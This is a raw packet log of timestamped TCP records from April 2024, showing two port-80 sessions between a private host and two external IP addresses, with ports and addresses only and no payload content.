Apr 26, 2024 23:09:03.117520094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117557049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117583036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117672920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117683887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117695093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117707968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117710114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117722034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117723942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117737055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117748976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117765903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117770910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117784977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117796898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117809057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117826939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117861986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117873907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117897034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117922068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117959976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118006945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118019104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118031025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118041992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118052959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118073940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118098974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118112087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118139982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118159056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118180990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118215084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118228912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118241072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118274927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118283987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118300915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118313074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118333101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118561983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118601084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.118694067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118707895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118719101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.118737936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.120584965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.120598078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.120630980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121030092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121072054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121109009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121121883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121153116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121160030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121196032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121233940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121253014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121265888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121300936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121594906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121608019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121643066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121651888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121727943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121741056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121759892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121794939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121835947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121835947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121850014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121886969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121903896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121917009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121948004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.121970892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.121984005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122016907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122054100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122107983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122119904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122138023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122139931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122176886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122188091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122236967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122251034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122271061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122306108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122344017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122379065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122399092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122440100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122447968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122492075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122504950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122524023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122548103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122586012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122622013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122636080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122646093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122669935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122737885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122751951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122773886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122792959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122833967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122855902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122874022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122884989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122898102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122910023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122910023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122934103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.122936010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122973919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.122998953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123045921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123066902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123090029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.123147011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123157978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123183966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.123270035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123284101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123301983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123313904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123327971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.123342991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123353958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.123377085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.123414040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123425961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123436928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.123461008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.138365030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.267880917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.267985106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.268053055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.301553965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.301640034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.301692009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.301703930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.301795959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.302047968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.302112103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.302273989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.302324057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.304753065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.304795027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.305181980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.305227041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.305253983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.305299997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.305331945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.305375099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.305499077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.305546045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.306746960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.306791067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.306931973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.306971073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307050943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307090998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307431936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307476044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307518959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307559967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307593107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307631016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307877064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307914972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.307954073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.307991982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308037043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308078051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308089018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308125973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308161974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308202028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308443069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308484077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308497906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308533907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308600903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308640957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308682919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308722019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308770895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308809996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308908939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308953047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.308962107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.308995008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309017897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309046984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309053898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309086084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309127092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309160948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309169054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309214115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309289932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309333086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309362888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309405088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309462070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309501886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309523106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309564114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309576035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309614897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309626102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309669971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309681892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309717894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309730053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309765100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309777021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309817076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309864998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309905052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.309917927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.309974909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310019016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310060024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310180902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310220957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310242891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310281038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310337067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310376883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310396910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310440063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310481071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310519934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310575008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310614109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310689926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310729027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310761929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310805082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310848951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310887098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.310935974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.310972929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311052084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311096907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311141968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311180115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311254025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311291933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311312914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311353922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311398983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311443090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311492920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311532021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311575890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311616898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311629057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311666012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311742067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311780930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311860085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311872005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311903000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311909914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311919928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.311959028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.311971903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312011003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312105894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312163115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312177896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312216997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312228918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312266111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312287092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312330008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312371969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312410116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312452078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312494040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312504053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312541008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312577009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312627077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312639952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312676907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312820911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312860012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.312880993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.312923908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.313004017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.313044071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.313113928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.313771009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.313810110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.313829899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.313870907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.313937902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.313977003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314162016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314203024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314260960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314301014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314341068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314379930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314431906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314470053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314567089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314606905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314670086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314713001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314856052 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314897060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.314910889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.314949036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315083981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.315133095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315145016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.315182924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315233946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.315274000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315336943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.315377951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315888882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.315927982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.315974951 CEST	80	49733	185.172.128.76	192.168.2.4
